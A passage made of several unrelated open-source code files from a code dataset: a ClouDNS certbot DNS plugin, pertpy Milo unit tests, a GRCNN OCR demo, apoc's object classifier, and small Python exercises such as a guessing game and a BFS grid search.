help='ClouDNS credentials INI file.')\n add('nameserver', help='The nameserver used to resolve CNAME aliases.')\n\n @staticmethod\n def more_info():\n return ('This plugin configures a DNS TXT record to respond to a '\n 'dns-01 challenge using the ClouDNS API.')\n\n def _setup_credentials(self):\n self.credentials = self._configure_credentials(\n 'credentials',\n 'ClouDNS credentials INI file',\n {\n 'auth-password': 'API password',\n },\n self._validate_user_ids\n )\n\n @staticmethod\n def _validate_user_ids(credentials):\n required_keys = ('auth-id', 'sub-auth-id', 'sub-auth-user')\n user_count = sum(int(credentials.conf(key) is not None)\n for key in required_keys)\n\n if user_count != 1:\n raise errors.PluginError(\n f\"{'Missing' if user_count == 0 else 'Unexpected'} \"\n f\"{'property' if user_count <= 2 else 'properties'} in \"\n f\"credentials configuration file \"\n f\"{credentials.confobj.filename}:\\n * Expected exactly one of \"\n f\"{', '.join(map(credentials.mapper, required_keys))}; \"\n f\"found {user_count}.\"\n )\n\n def _perform(self, _domain, validation_name, validation):\n self._get_client().add_txt_record(\n _domain, self._resolve_alias(validation_name), validation, self.ttl\n )\n\n def _cleanup(self, _domain, validation_name, validation):\n self._get_client().del_txt_record(\n _domain, self._resolve_alias(validation_name), validation\n )\n\n def _resolve_alias(self, validation_name):\n return resolve_alias(validation_name,\n nameserver=self.conf('nameserver'))\n\n @functools.lru_cache(maxsize=None)\n def _get_client(self):\n return 
ClouDNSClient(self.credentials)\n","repo_name":"inventage/certbot-dns-cloudns","sub_path":"certbot_dns_cloudns/_internal/authenticator.py","file_name":"authenticator.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"}
{"seq_id":"24313942876","text":"import numpy as np\nimport pandas as pd\nimport pertpy as pt\nimport pytest\nimport scanpy as sc\nfrom mudata import MuData\n\ntry:\n    from rpy2.robjects.packages import importr\n\n    r_dependency = importr(\"edgeR\")\nexcept Exception:  # noqa: BLE001\n    r_dependency = None\n\n\nclass TestMilopy:\n    milo = pt.tl.Milo()\n\n    @pytest.fixture\n    def adata(self):\n        adata = sc.datasets.pbmc68k_reduced()\n        return adata\n\n    def test_load(self, adata):\n        mdata = self.milo.load(adata)\n        assert isinstance(mdata, MuData)\n        assert \"rna\" in mdata.mod\n\n    def test_make_nhoods_number(self, adata):\n        adata = adata.copy()\n        p = 0.1\n        adata = self.milo.make_nhoods(adata, prop=p, copy=True)\n        assert adata.obsm[\"nhoods\"].shape[1] <= int(np.round(adata.n_obs * p))\n\n    def test_make_nhoods_missing_connectivities(self, adata):\n        adata = adata.copy()\n        p = 0.1\n        del adata.obsp[\"connectivities\"]\n        with pytest.raises(KeyError):\n            adata = self.milo.make_nhoods(adata, prop=p)\n\n    def test_make_nhoods_sizes(self, adata):\n        adata = adata.copy()\n        self.milo.make_nhoods(adata)\n        knn_graph = adata.obsp[\"connectivities\"]\n        knn_graph[knn_graph != 0] = 1\n        assert knn_graph.sum(0).min() <= adata.obsm[\"nhoods\"].sum(0).min()\n\n    def test_make_nhoods_neighbors_key(self, adata):\n        adata = adata.copy()\n        k = adata.uns[\"neighbors\"][\"params\"][\"n_neighbors\"]\n        test_k = 5\n        sc.pp.neighbors(adata, n_neighbors=test_k, key_added=\"test\")\n        self.milo.make_nhoods(adata, neighbors_key=\"test\")\n        smallest_size = adata.obsm[\"nhoods\"].toarray().sum(0).min()\n        assert test_k < k\n        assert smallest_size < k\n\n    def test_count_nhoods_sample_values(self, adata):\n        adata = adata.copy()\n        self.milo.make_nhoods(adata)\n        # Extract cells of one nhood\n        nh = 1\n        sample_col = \"phase\"\n        milo_mdata = self.milo.count_nhoods(adata, sample_col=sample_col)\n        nh_cells = adata.obsm[\"nhoods\"][:, nh].nonzero()[0]\n\n        # Value count the sample composition\n        top_a = adata.obs.iloc[nh_cells].value_counts(sample_col).values.ravel()\n\n        # Check it matches the one calculated\n        sample_adata = milo_mdata[\"milo\"]\n        df = pd.DataFrame(sample_adata.X.T[nh, :].toarray()).T\n        df.index = sample_adata.obs_names\n        top_b = df.sort_values(0, ascending=False).values.ravel()\n        assert all((top_b - top_a) == 0), 'The counts for samples in milo_mdata[\"milo\"] do not match'\n\n    def test_count_nhoods_missing_nhoods(self, adata):\n        adata = adata.copy()\n        self.milo.make_nhoods(adata)\n        sample_col = \"phase\"\n        del adata.obsm[\"nhoods\"]\n        with pytest.raises(KeyError):\n            _ = self.milo.count_nhoods(adata, sample_col=sample_col)\n\n    def test_count_nhoods_sample_order(self, adata):\n        adata = adata.copy()\n        self.milo.make_nhoods(adata)\n        # Extract cells of one nhood\n        nh = 1\n        sample_col = \"phase\"\n        milo_mdata = self.milo.count_nhoods(adata, sample_col=sample_col)\n        nh_cells = adata.obsm[\"nhoods\"][:, nh].nonzero()[0]\n\n        # Value count the sample composition\n        top_a = adata.obs.iloc[nh_cells].value_counts(sample_col).index[0]\n\n        # Check it matches the one calculated\n        sample_adata = milo_mdata[\"milo\"]\n        df = pd.DataFrame(sample_adata.X.T[nh, :].toarray()).T\n        df.index = sample_adata.obs_names\n        top_b = df.sort_values(0, 
ascending=False).index[0]\n\n        assert top_a == top_b, 'The order of samples in milo_mdata[\"milo\"] does not match'\n\n    # @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    @pytest.fixture\n    def da_nhoods_mdata(self, adata):\n        adata = adata.copy()\n        self.milo.make_nhoods(adata)\n\n        # Simulate experimental condition\n        rng = np.random.default_rng(seed=42)\n        adata.obs[\"condition\"] = rng.choice([\"ConditionA\", \"ConditionB\"], size=adata.n_obs, p=[0.5, 0.5])\n        # we simulate differential abundance in NK cells\n        DA_cells = adata.obs[\"louvain\"] == \"1\"\n        adata.obs.loc[DA_cells, \"condition\"] = rng.choice(\n            [\"ConditionA\", \"ConditionB\"], size=sum(DA_cells), p=[0.2, 0.8]\n        )\n\n        # Simulate replicates\n        adata.obs[\"replicate\"] = rng.choice([\"R1\", \"R2\", \"R3\"], size=adata.n_obs)\n        adata.obs[\"sample\"] = adata.obs[\"replicate\"] + adata.obs[\"condition\"]\n        milo_mdata = self.milo.count_nhoods(adata, sample_col=\"sample\")\n        return milo_mdata\n\n    # @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    def test_da_nhoods_missing_samples(self, adata):\n        with pytest.raises(KeyError):\n            self.milo.da_nhoods(adata, design=\"~condition\")\n\n    # @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    def test_da_nhoods_missing_covariate(self, da_nhoods_mdata):\n        mdata = da_nhoods_mdata.copy()\n        with pytest.raises(KeyError):\n            self.milo.da_nhoods(mdata, design=\"~ciaone\")\n\n    # @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    def test_da_nhoods_non_unique_covariate(self, da_nhoods_mdata):\n        mdata = da_nhoods_mdata.copy()\n        with pytest.raises(AssertionError):\n            self.milo.da_nhoods(mdata, design=\"~phase\")\n\n    @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    def test_da_nhoods_pvalues(self, da_nhoods_mdata):\n        mdata = da_nhoods_mdata.copy()\n        self.milo.da_nhoods(mdata, design=\"~condition\")\n        sample_adata = mdata[\"milo\"].copy()\n        min_p, max_p = sample_adata.var[\"PValue\"].min(), sample_adata.var[\"PValue\"].max()\n        assert (min_p >= 0) & (max_p <= 1), \"P-values are not between 0 and 1\"\n\n    @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    def test_da_nhoods_fdr(self, da_nhoods_mdata):\n        mdata = da_nhoods_mdata.copy()\n        self.milo.da_nhoods(mdata, design=\"~condition\")\n        sample_adata = mdata[\"milo\"].copy()\n        assert np.all(\n            np.round(sample_adata.var[\"PValue\"], 10) <= np.round(sample_adata.var[\"SpatialFDR\"], 10)\n        ), \"FDR is higher than uncorrected P-values\"\n\n    @pytest.mark.skipif(r_dependency is None, reason=\"Requires R dependency\")\n    def test_da_nhoods_default_contrast(self, da_nhoods_mdata):\n        mdata = da_nhoods_mdata.copy()\n        adata = mdata[\"rna\"].copy()\n        adata.obs[\"condition\"] = (\n            adata.obs[\"condition\"].astype(\"category\").cat.reorder_categories([\"ConditionA\", \"ConditionB\"])\n        )\n        self.milo.da_nhoods(mdata, design=\"~condition\")\n        default_results = mdata[\"milo\"].var.copy()\n        self.milo.da_nhoods(mdata, design=\"~condition\", model_contrasts=\"conditionConditionB-conditionConditionA\")\n        contr_results = mdata[\"milo\"].var.copy()\n\n        assert np.corrcoef(contr_results[\"SpatialFDR\"], default_results[\"SpatialFDR\"])[0, 1] > 0.99\n        assert np.corrcoef(contr_results[\"logFC\"], default_results[\"logFC\"])[0, 1] > 0.99\n\n    @pytest.fixture\n    def annotate_nhoods_mdata(self, adata):\n        adata = adata.copy()\n        self.milo.make_nhoods(adata)\n\n        # Simulate experimental condition\n        rng = np.random.default_rng(seed=42)\n        
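# Note (added): the skewed p=[0.2, 0.8] draw below plants a known\n        # differential-abundance signal in louvain cluster "1", mirroring the\n        # da_nhoods_mdata fixture above.\n        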
adata.obs[\"condition\"] = rng.choice([\"ConditionA\", \"ConditionB\"], size=adata.n_obs, p=[0.5, 0.5])\n # we simulate differential abundance in NK cells\n DA_cells = adata.obs[\"louvain\"] == \"1\"\n adata.obs.loc[DA_cells, \"condition\"] = rng.choice(\n [\"ConditionA\", \"ConditionB\"], size=sum(DA_cells), p=[0.2, 0.8]\n )\n\n # Simulate replicates\n adata.obs[\"replicate\"] = rng.choice([\"R1\", \"R2\", \"R3\"], size=adata.n_obs)\n adata.obs[\"sample\"] = adata.obs[\"replicate\"] + adata.obs[\"condition\"]\n milo_mdata = self.milo.count_nhoods(adata, sample_col=\"sample\")\n return milo_mdata\n\n def test_annotate_nhoods_missing_samples(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n del mdata.mod[\"milo\"]\n with pytest.raises(ValueError):\n self.milo.annotate_nhoods_continuous(mdata, anno_col=\"S_score\")\n\n def test_annotate_nhoods_continuous_mean_range(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n self.milo.annotate_nhoods_continuous(mdata, anno_col=\"S_score\")\n assert mdata[\"milo\"].var[\"nhood_S_score\"].max() < mdata[\"rna\"].obs[\"S_score\"].max()\n assert mdata[\"milo\"].var[\"nhood_S_score\"].min() > mdata[\"rna\"].obs[\"S_score\"].min()\n\n def test_annotate_nhoods_continuous_correct_mean(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n self.milo.annotate_nhoods_continuous(mdata, anno_col=\"S_score\")\n rng = np.random.default_rng(seed=42)\n i = rng.choice(np.arange(mdata[\"milo\"].n_obs))\n mean_val_nhood = mdata[\"rna\"].obs[mdata[\"rna\"].obsm[\"nhoods\"][:, i].toarray() == 1][\"S_score\"].mean()\n assert mdata[\"milo\"].var[\"nhood_S_score\"][i] == pytest.approx(mean_val_nhood, 0.0001)\n\n def test_annotate_nhoods_annotation_frac_range(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n self.milo.annotate_nhoods(mdata, anno_col=\"louvain\")\n assert mdata[\"milo\"].var[\"nhood_annotation_frac\"].max() <= 1.0\n assert mdata[\"milo\"].var[\"nhood_annotation_frac\"].min() >= 0.0\n\n def test_annotate_nhoods_cont_gives_error(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n with pytest.raises(ValueError):\n self.milo.annotate_nhoods(mdata, anno_col=\"S_score\")\n\n @pytest.fixture\n def add_nhood_expression_mdata(self):\n adata = sc.datasets.pbmc3k()\n sc.pp.normalize_per_cell(adata)\n sc.pp.log1p(adata)\n sc.pp.highly_variable_genes(adata)\n sc.pp.pca(adata)\n sc.pp.neighbors(adata)\n sc.tl.leiden(adata)\n self.milo.make_nhoods(adata)\n\n # Simulate experimental condition\n rng = np.random.default_rng(seed=42)\n adata.obs[\"condition\"] = rng.choice([\"ConditionA\", \"ConditionB\"], size=adata.n_obs, p=[0.2, 0.8])\n # we simulate differential abundance in NK cells\n DA_cells = adata.obs[\"leiden\"] == \"1\"\n adata.obs.loc[DA_cells, \"condition\"] = rng.choice(\n [\"ConditionA\", \"ConditionB\"], size=sum(DA_cells), p=[0.2, 0.8]\n )\n\n # Simulate replicates\n adata.obs[\"replicate\"] = rng.choice([\"R1\", \"R2\", \"R3\"], size=adata.n_obs)\n adata.obs[\"sample\"] = adata.obs[\"replicate\"] + adata.obs[\"condition\"]\n milo_mdata = self.milo.count_nhoods(adata, sample_col=\"sample\")\n return milo_mdata\n\n def test_add_nhood_expression_nhood_mean_range(self, add_nhood_expression_mdata):\n mdata = add_nhood_expression_mdata.copy()\n self.milo.add_nhood_expression(mdata)\n assert mdata[\"milo\"].varm[\"expr\"].shape[1] == mdata[\"rna\"].n_vars\n mdata = add_nhood_expression_mdata.copy()\n self.milo.add_nhood_expression(mdata)\n nhood_ix = 10\n nhood_gex = 
mdata[\"milo\"].varm[\"expr\"][nhood_ix, :].toarray().ravel()\n nhood_cells = mdata[\"rna\"].obs_names[mdata[\"rna\"].obsm[\"nhoods\"][:, nhood_ix].toarray().ravel() == 1]\n mean_gex = np.array(mdata[\"rna\"][nhood_cells].X.mean(axis=0)).ravel()\n assert nhood_gex == pytest.approx(mean_gex, 0.0001)\n","repo_name":"ONERAI/pertpy","sub_path":"tests/tools/test_milo.py","file_name":"test_milo.py","file_ext":"py","file_size_in_byte":11434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"15018682891","text":"# -*- coding: utf-8 -*-\r\n\r\ndef demo_grcnn(config_yaml):\r\n\r\n import sys\r\n sys.path.append('./recognition_model/GRCNN')\r\n\r\n import torch\r\n import os\r\n from utils import keys\r\n from models import crann\r\n import dataset\r\n from utils import util\r\n import torch.nn.functional as F\r\n import io\r\n import yaml\r\n import tools.utils as utils\r\n import tools.dataset_lmdb as dataset_lmdb\r\n import torchvision.transforms as transforms\r\n import lmdb\r\n import cv2\r\n\r\n # 需要在配置文件里体现\r\n # opt.model_path = 'checkpoints/grcnn_art/crann_11_1.pth'\r\n # batch_size = 16\r\n #imgH = 32\r\n # maxW = 100\r\n # num_workers = 4\r\n # cnn_model = 'grcnn'\r\n # rnn_model = 'compositelstm'\r\n # n_In = 512\r\n # n_Hidden = 256\r\n # test_set = '../art_test.txt'\r\n\r\n # from yacs.config import CfgNode as CN\r\n #\r\n # def read_config_file(config_file):\r\n # # 用yaml重构配置文件\r\n # f = open(config_file)\r\n # opt = CN.load_cfg(f)\r\n # return opt\r\n #\r\n # opt = read_config_file(config_file)\r\n\r\n f = open(config_yaml, encoding='utf-8')\r\n opt = yaml.load(f)\r\n\r\n\r\n\r\n alphabet = keys.alphabet\r\n nClass = len(alphabet) + 1\r\n converter = util.strLabelConverter(alphabet)\r\n\r\n model = crann.CRANN(opt, nClass).cuda()\r\n if os.path.isfile(opt['DEMO']['model_path']):\r\n print(\"=> loading checkpoint '{}'\".format(opt['DEMO']['model_path']))\r\n checkpoint = torch.load(opt['DEMO']['model_path'])\r\n start_epoch = checkpoint['epoch']\r\n # best_pred = checkpoint['best_pred']\r\n model.load_state_dict(checkpoint['state_dict'])\r\n # print(\"=> loaded checkpoint '{}' (epoch {} accuracy {})\"\r\n # .format(opt.model_path, checkpoint['epoch'], best_pred))\r\n\r\n model.eval()\r\n\r\n # root, mappinggit\r\n\r\n train_set = dataset_lmdb.lmdbDataset(opt['DEMO']['test_set_lmdb'])\r\n\r\n # train_set = dataset.testDataset(opt['test_set']) # dataset.graybackNormalize()\r\n test_loader = torch.utils.data.DataLoader(train_set,\r\n batch_size=opt['TRAIN']['BATCH_SIZE'],\r\n shuffle=False,\r\n num_workers=opt['WORKERS'],\r\n collate_fn=dataset.alignCollate(\r\n imgH=opt['TRAIN']['IMG_H'],\r\n imgW=opt['TRAIN']['MAX_W']))\r\n\r\n file = open('./pred.txt', 'w', encoding='utf-8')\r\n\r\n try:\r\n import shutil\r\n shutil.rmtree('./GRCNN_DEMO')\r\n # os.makedirs('./MORAN_DEMO')\r\n except:\r\n pass\r\n os.makedirs('./GRCNN_DEMO')\r\n record_file = open('./GRCNN_DEMO/result.txt', 'a', encoding='utf-8')\r\n\r\n\r\n\r\n index = 0\r\n for i, (cpu_images, targets) in enumerate(test_loader):\r\n\r\n # 还可以再改造一下\r\n\r\n\r\n\r\n bsz = cpu_images.size(0)\r\n images = cpu_images.cuda()\r\n\r\n predict = model(images)\r\n predict_len = torch.IntTensor([predict.size(0)] * bsz)\r\n _, acc = predict.max(2)\r\n acc = acc.transpose(1, 0).contiguous().view(-1)\r\n prob, _ = F.softmax(predict, dim=2).max(2)\r\n probilities = torch.mean(prob, dim=1)\r\n sim_preds = converter.decode(acc.data, predict_len.data, raw=False)\r\n\r\n cnt = 0\r\n for probility, pred, 
target in zip(probilities, sim_preds, targets):\r\n            index += 1\r\n            img_key = 'gt_%d' % index\r\n            file.write('%s:\\t\\t\\t\\t%.3f%%\\t%-20s\\n' % (img_key, probility.item() * 100, pred))\r\n\r\n            # print(\"debug start\")\r\n            # print(images[0].size)\r\n            # print(\"debug end\")\r\n\r\n            # cv2.imwrite('./GRCNN_DEMO/' + str(index) + '.jpg', (images[cnt].cpu().numpy() + 1.0) * 128)\r\n            record_file.write('./GRCNN_DEMO/' + str(index) + '.jpg' + ' ' + pred + ' ' + target + ' \\n')\r\n            cnt += 1\r\n\r\n\r\n    file.close()","repo_name":"FudanOCR/FudanOCR","sub_path":"model/demo/grcnn.py","file_name":"grcnn.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}
{"seq_id":"25533704655","text":"import random\r\na=random.randint(1,9)\r\nproby=0\r\nb=0\r\n\r\nwhile b != a and b != \"exit\":\r\n    b=input(\"Try to guess the drawn number from the range 1-9, or type 'exit' to end the game: \")\r\n    if b == \"exit\":\r\n        break\r\n    b=int(b)\r\n    proby+=1\r\n    if b<a:\r\n        print(\"You entered too small a number!\")\r\n    elif b>a:\r\n        print(\"You entered too big a number!\")\r\n    else:\r\n        print(\"You got it!\")\r\n        print(\"It took you as many as\",proby,\"tries!\")\r\n","repo_name":"sandrakorcz/PYTHON","sub_path":"PYTHON/Zadania z practicepython.org/9.GuessingGameOne.py","file_name":"9.GuessingGameOne.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"38102347570","text":"print('--------------------Question-5---------------------')\n#Creating class\nclass employee:\n    # INITIALIZATION\n    def __init__(self,name,salary):\n        self.name=name\n        self.salary=salary\n\n    # Function to print Info\n    def info(self):\n        print(f\"Employee Name: {self.name}\")\n        print(f\"Employee Salary: {self.salary} \")\n        print(\"\")\n\n\n# Creating objects\nemployee1=employee(\"Mehak\",40000)\nemployee2=employee(\"Ashok\",50000)\nemployee3=employee(\"Viren\",60000)\n\n# Printing employee info\nemployee1.info()\nemployee2.info()\nemployee3.info()\n\n# Updating salary of Mehak\nemployee1.salary=70000\n\n#Printing updated info of Mehak\nprint(\"Updated record of Mehak\")\nemployee1.info()\n\n# Deleting record of Viren\ndel employee3\nprint(\"Record of Viren deleted\")\n\n\n","repo_name":"Himanshu2557/Assignment","sub_path":"Assignment_4/Sol/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"70560882728","text":"from ._table_row_classifier import TableRowClassifier\nimport numpy as np\n\n\nclass ObjectClassifier():\n    def __init__(self, opencl_filename=\"temp_object_classifier.cl\", max_depth: int = 2, num_ensembles: int = 100, overwrite_classname: str = None):\n        \"\"\"\n        A RandomForestClassifier for label classification that converts itself to OpenCL after training.\n\n        Parameters\n        ----------\n        opencl_filename : str (optional)\n        max_depth : int (optional)\n        num_ensembles : int (optional)\n\n        See Also\n        --------\n        https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html\n        \"\"\"\n        self.FEATURE_SPECIFICATION_KEY = \"feature_specification = \"\n\n        self._data = {}\n\n        self._classname = self.__class__.__name__\n        if overwrite_classname is not None:\n            self._classname = overwrite_classname\n        self.opencl_filename = opencl_filename\n        self.classifier = TableRowClassifier(\n            opencl_filename=opencl_filename,\n            max_depth=max_depth,\n            num_ensembles=num_ensembles,\n            
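# forward the settings above to the underlying table-row classifier\n            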
overwrite_classname=self._classname\n )\n\n def __str__(self) -> str:\n \"\"\"Return classifier information as string.\"\"\"\n return str(self.classifier)\n\n def __repr__(self) -> str:\n \"\"\"Return classifier information as string.\"\"\"\n return str(self.classifier)\n\n def train(self, features: str, labels, sparse_annotation, image=None, continue_training : bool = False):\n \"\"\"\n Train a classifier that can differentiate label types according to intensity, size and shape.\n\n Parameters\n ----------\n features: Space separated string containing those:\n 'area',\n 'min_intensity', 'max_intensity', 'sum_intensity', 'mean_intensity', 'standard_deviation_intensity',\n 'mass_center_x', 'mass_center_y', 'mass_center_z',\n 'centroid_x', 'centroid_y', 'centroid_z',\n 'max_distance_to_centroid', 'max_distance_to_mass_center',\n 'mean_max_distance_to_centroid_ratio', 'mean_max_distance_to_mass_center_ratio',\n 'touching_neighbor_count', 'average_distance_of_touching_neighbors', 'average_distance_of_n_nearest_neighbors'\n labels: label image\n sparse_annotation: label image with annotations. If one label is annotated with multiple classes, the\n maximum is considered while training.\n image: intensity image (optional)\n\n \"\"\"\n self.classifier.feature_specification = features.replace(\",\", \" \")\n\n # remove too many spaces\n while \" \" in self.classifier.feature_specification:\n self.classifier.feature_specification = self.classifier.feature_specification.replace(\" \", \" \")\n self.classifier.feature_specification = self.classifier.feature_specification.strip()\n\n selected_features, gt = self._make_features(self.classifier.feature_specification, labels, sparse_annotation, image)\n self.classifier.train(selected_features, gt, continue_training=continue_training)\n self.to_opencl_file(self.opencl_filename, overwrite_classname=self.__class__.__name__)\n\n def predict(self, labels, image=None):\n \"\"\"Predict object class from label image and optional intensity image.\n\n Parameters\n ----------\n labels: label image\n image: intensity image\n\n Returns\n -------\n label image representing a semantic segmentation: pixel intensities represent label class\n\n \"\"\"\n import pyclesperanto_prototype as cle\n labels = cle.push(labels)\n\n selected_features, _ = self._make_features(self.classifier.feature_specification, labels, None, image)\n output = self.classifier.predict(selected_features)\n if len(output.shape) == 1: # backwards compatibility: make sure it's 2D\n output = cle.push([output])\n self._data[\"APOC_ObjectClassifier_CLUSTER_ID\"] = np.asarray(output)[0]\n\n # set background to zero\n cle.set_column(output, 0, 0)\n\n result_labels = cle.create_labels_like(labels)\n cle.replace_intensities(labels, output, result_labels)\n\n return result_labels\n\n def to_opencl_file(self, filename, extra_information: str = None, overwrite_classname: str = None):\n \"\"\"Save the classifier to an OpenCL-file.\n\n See Also\n --------\n .. PixelClassifier.to_opencl_file()\n \"\"\"\n if overwrite_classname is None:\n overwrite_classname = self.__class__.__name__\n return self.classifier.to_opencl_file(filename=filename, extra_information=extra_information,\n overwrite_classname=overwrite_classname)\n\n def _make_features(self, features: str, labels, annotation=None, image=None):\n \"\"\"Determine requested features. 
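Expensive intermediates (the touch and\n        distance matrices) are built lazily in _select_features, only when a\n        requested feature needs them. 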
If annotation is provided, also a ground-truth vector will be returned.\n\n        Parameters\n        ----------\n        features: str\n            see train() function for explanation\n        labels: ndimage (int)\n        annotation: ndimage(int), optional\n            sparse annotation label image\n        image: ndimage, optional\n            intensity image for e.g. mean intensity calculation\n\n        Returns\n        -------\n        table: dict of vectors\n        gt: vector\n        \"\"\"\n\n        import pyclesperanto_prototype as cle\n        pixel_statistics = cle.statistics_of_background_and_labelled_pixels(image, labels)\n\n        if annotation is not None:\n            # determine ground truth\n            annotation_statistics = cle.statistics_of_background_and_labelled_pixels(annotation, labels)\n            classification_gt = annotation_statistics['max_intensity']\n            classification_gt[0] = 0\n        else:\n            classification_gt = None\n\n        feature_list = features.split(' ')\n\n        table, gt = self._select_features(pixel_statistics, feature_list, labels, classification_gt)\n\n        return table, gt\n\n    def _make_touch_matrix(self, labels, touch_matrix = None):\n        \"\"\"Generate an adjacency graph matrix representing touching objects.\n\n        Parameters\n        ----------\n        labels: ndimage\n        touch_matrix: ndimage, optional\n            returned as-is if not None\n\n        Returns\n        -------\n        touch_matrix, see [1]\n\n        See Also\n        --------\n        ..[1] https://github.com/clEsperanto/pyclesperanto_prototype/blob/master/demo/neighbors/mesh_between_touching_neighbors.ipynb\n        \"\"\"\n        if touch_matrix is None:\n            import pyclesperanto_prototype as cle\n            touch_matrix = cle.generate_touch_matrix(labels)\n        return touch_matrix\n\n    def _make_distance_matrix(self, labels, distance_matrix = None):\n        \"\"\"Generate a matrix with (n+1)*(n+1) elements for a label image with n labels. In this matrix, element (x,y)\n        corresponds to the centroid distance between label x and label y.\n\n        Parameters\n        ----------\n        labels: ndimage(int)\n        distance_matrix: ndimage, optional\n            returned as-is if not None\n\n        Returns\n        -------\n        distance_matrix, see [1]\n\n        ..[1] https://github.com/clEsperanto/pyclesperanto_prototype/blob/master/demo/neighbors/mesh_with_distances.ipynb\n        \"\"\"\n        if distance_matrix is None:\n            import pyclesperanto_prototype as cle\n            centroids = cle.centroids_of_labels(labels)\n            distance_matrix = cle.generate_distance_matrix(centroids, centroids)\n            cle.set_column(distance_matrix, 0, 0)\n            cle.set_row(distance_matrix, 0, 0)\n\n        return distance_matrix\n\n    def _select_features(self, all_features, features_to_select, labels, ground_truth=None):\n        \"\"\"Provided with all easy-to-determine features, select requested features and calculate the more complicated\n        features.\n\n        Parameters\n        ----------\n        all_features: dict[vector]\n        features_to_select: list[str]\n        labels: ndimage\n        ground_truth: ndimage, optional\n\n        Returns\n        -------\n        result:list[vector]\n            list of vectors corresponding to the requested features.\n            If ground_truth is not None:\n                The vectors are shaped (n) for n labels that were annotated. Labels without annotation\n                are removed from the vectors. 
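For example, with 10 annotated\n                labels out of 50 in the image, each returned vector has length 10. 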
Background measurements are removed,\n because background cannot be classified.\n If ground_truth is None:\n The vectors are shaped (n+1) for n labels.\n That is, background + n measurements for n labels.\n ground_truth: ndimage\n selected elements of provided ground truth where it's not 0\n \"\"\"\n import pyclesperanto_prototype as cle\n result = {}\n self._data = {}\n touch_matrix = None\n distance_matrix = None\n mask = None\n neighbor_statistics = None\n\n if ground_truth is not None:\n mask = ground_truth > 0\n\n for key in features_to_select:\n vector = None\n\n if key in all_features.keys():\n vector = np.asarray([0] + all_features[key])\n elif key == \"touching_neighbor_count\":\n touch_matrix = self._make_touch_matrix(labels, touch_matrix)\n vector = cle.pull(cle.count_touching_neighbors(touch_matrix))[0]\n elif key == \"average_distance_of_touching_neighbors\":\n touch_matrix = self._make_touch_matrix(labels, touch_matrix)\n distance_matrix = self._make_distance_matrix(labels, distance_matrix)\n vector = cle.pull(cle.average_distance_of_touching_neighbors(distance_matrix, touch_matrix))[0]\n elif key.startswith(\"average_distance_of_n_nearest_neighbors=\"):\n n = int(key.replace(\"average_distance_of_n_nearest_neighbors=\", \"\"))\n distance_matrix = self._make_distance_matrix(labels, distance_matrix)\n vector = cle.pull(cle.average_distance_of_n_shortest_distances(distance_matrix, n=n))[0]\n elif len(key) == 0:\n pass\n else:\n # test if the feature is in neighbor statistics\n if neighbor_statistics is None:\n neighbor_statistics = cle.statistics_of_labelled_neighbors(labels)\n if key in neighbor_statistics:\n values = [0] + neighbor_statistics[key].tolist()\n vector = np.asarray(values)\n else:\n raise Exception(\"Feature \" + key + \" is not known!\")\n\n if vector is not None:\n if ground_truth is not None:\n result[key] = np.asarray([vector[mask]])[0]\n else:\n result[key] = np.asarray([vector])[0]\n self._data[key] = result[key]\n\n if ground_truth is not None:\n self._data['label'] = all_features['label'][mask]\n return result, ground_truth[mask]\n else:\n self._data['label'] = all_features['label']\n return result, None\n\n def feature_importances(self):\n \"\"\"Provide feature importances about the trained Random Forest Classifier\n\n The values are provided as dictionary {feature_name:portion_importance}.\n\n See also\n --------\n ..[0] https://scikit-learn.org/stable/auto_examples/ensemble/plot_forest_importances.html\n \"\"\"\n return self.classifier.feature_importances()\n\n def statistics(self):\n return self.classifier.statistics()\n","repo_name":"haesleinhuepf/apoc","sub_path":"apoc/_object_classifier.py","file_name":"_object_classifier.py","file_ext":"py","file_size_in_byte":11678,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"11193895591","text":"from sys import stdin as s\nfrom collections import deque\nimport copy\n\ns = open('input.txt','rt')\n\nN, M = list(map(int,s.readline().split()))\n\narray = [list(map(str,s.readline().rstrip())) for _ in range(N)]\n\ndx = [0,-1,0,1]\ndy = [1,0,-1,0]\nglobal result\nresult =0\ndef bfs(x,y):\n global result\n maps = [item[:] for item in array]\n h = 0\n q = deque()\n q.append((x,y,h))\n maps[x][y] = 'W'\n ans = 0\n while q:\n hx ,hy,hh = q.popleft()\n ans = max(ans,hh)\n for i in range(4):\n nx = hx + dx[i]\n ny = hy + dy[i]\n nh = hh\n if 0 <= nx < N and 0 <= ny < M and maps[nx][ny] != 'W':\n maps[nx][ny] = 'W'\n q.append((nx,ny,nh+1))\n \n \n return 
